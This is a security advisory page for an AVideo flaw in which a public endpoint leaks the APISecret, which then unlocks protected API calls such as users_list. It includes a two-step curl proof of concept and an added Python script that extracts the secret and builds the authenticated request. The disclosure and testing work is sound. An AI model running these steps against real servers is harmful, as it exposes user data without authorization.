CVE-2026-43885

EPSS 0.07%

AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization

Published: 5/5/2026
Modified: 5/13/2026

Also known as: GHSA-xr49-f4rh-qcjf

Description

### Summary

An unauthenticated user can read `APISecret` from `objects/plugins.json.php` and use it to call protected API endpoints (e.g. `users_list`) without logging in.

### Details

`objects/plugins.json.php` is public and still exposes plugin `object_data` containing `APISecret`. That secret is accepted by `plugin/API/get.json.php` as authentication.

### PoC

1. Get the plugin config (contains `APISecret`):

```bash
curl 'http://<host>/objects/plugins.json.php'
```

2. Copy `APISecret` from the response, then call the API directly:

```bash
curl --get 'http://<host>/plugin/API/get.json.php' \
  --data-urlencode 'APIName=users_list' \
  --data-urlencode 'APISecret=<APISecret>' \
  --data-urlencode 'rowCount=3' \
  --data-urlencode 'current=1'
```

### Impact

Unauthenticated disclosure of sensitive configuration (`APISecret`), leading to unauthorized access to protected API data.

### Recommended fix

Require admin authentication for the full plugin inventory/config endpoint.
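The two PoC steps above, as an added example that is not part of the advisory or the AVideo project: it parses a `plugins.json.php` response, pulls `APISecret` out of plugin `object_data` (handling `object_data` both as a nested object and as a JSON-encoded string, since the advisory does not say which), and builds the `get.json.php` request the second step issues. The response shape in `SAMPLE_PLUGINS_JSON` is constructed for this example and is an assumption; the only facts taken from the advisory are the two endpoint paths, the `object_data` / `APISecret` keys and the query parameters. A patched instance should make `check()` return `(None, None)`, because the inventory endpoint no longer hands back the secret to an unauthenticated client.

```python
import json
from urllib.parse import urlencode, urljoin

# Constructed sample of what an unpatched objects/plugins.json.php might return.
# The exact layout is an assumption for this example; the advisory only states
# that plugin object_data contains APISecret.
SAMPLE_PLUGINS_JSON = json.dumps({
    "rows": [
        {"id": 1, "name": "Live",
         "object_data": json.dumps({"useLiveServers": True})},
        {"id": 2, "name": "API",
         "object_data": json.dumps({"APISecret": "constructed-secret-0123",
                                    "APIAllowedIPs": ""})},
    ]
})


def find_key(node, key):
    """Depth-first search for `key` in nested dicts/lists.

    Strings that look like JSON documents are parsed and descended into, so a
    serialised object_data column is searched the same way as a nested object.
    """
    if isinstance(node, dict):
        if key in node:
            return node[key]
        for value in node.values():
            found = find_key(value, key)
            if found is not None:
                return found
    elif isinstance(node, list):
        for value in node:
            found = find_key(value, key)
            if found is not None:
                return found
    elif isinstance(node, str):
        text = node.strip()
        if text and text[0] in "{[":
            try:
                return find_key(json.loads(text), key)
            except ValueError:
                return None
    return None


def extract_api_secret(body):
    """Return the leaked APISecret from a plugins.json.php body, or None.

    None covers a patched server (auth error page, non-JSON) as well as an
    instance whose API plugin has no secret configured.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return None
    secret = find_key(data, "APISecret")
    return secret if isinstance(secret, str) and secret else None


def build_api_url(base, secret, api_name="users_list", row_count=3, current=1):
    """Build the step-2 request: the same parameters the curl PoC sends."""
    params = {"APIName": api_name, "APISecret": secret,
              "rowCount": row_count, "current": current}
    return urljoin(base, "plugin/API/get.json.php") + "?" + urlencode(params)


def check(base, fetch):
    """Run the two-step check. `fetch(url)` returns a response body as text.

    `base` must end with "/" for installs in a sub-directory. Returns
    (secret, api_url) when the secret is exposed, otherwise (None, None).
    """
    secret = extract_api_secret(fetch(urljoin(base, "objects/plugins.json.php")))
    if secret is None:
        return None, None
    return secret, build_api_url(base, secret)


if __name__ == "__main__":
    # Offline run against the constructed sample. Against a host you are
    # authorised to test, pass a real fetcher, e.g. one built on urllib.request.
    leaked, url = check("http://example.invalid/", lambda url: SAMPLE_PLUGINS_JSON)
    print("APISecret exposed:" if leaked else "no secret exposed", leaked or "")
    if url:
        print("step 2 request:", url)
```

The `object_data` handling is the part worth keeping when adapting this: AVideo plugin settings are stored per plugin, and whether the inventory endpoint emits them as an embedded object or as a JSON string decides whether a naive `response["APISecret"]` lookup finds anything, so the search treats both forms the same.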

Affected packages (1)

CVSS scores

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 4.0 | | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P |

References (4)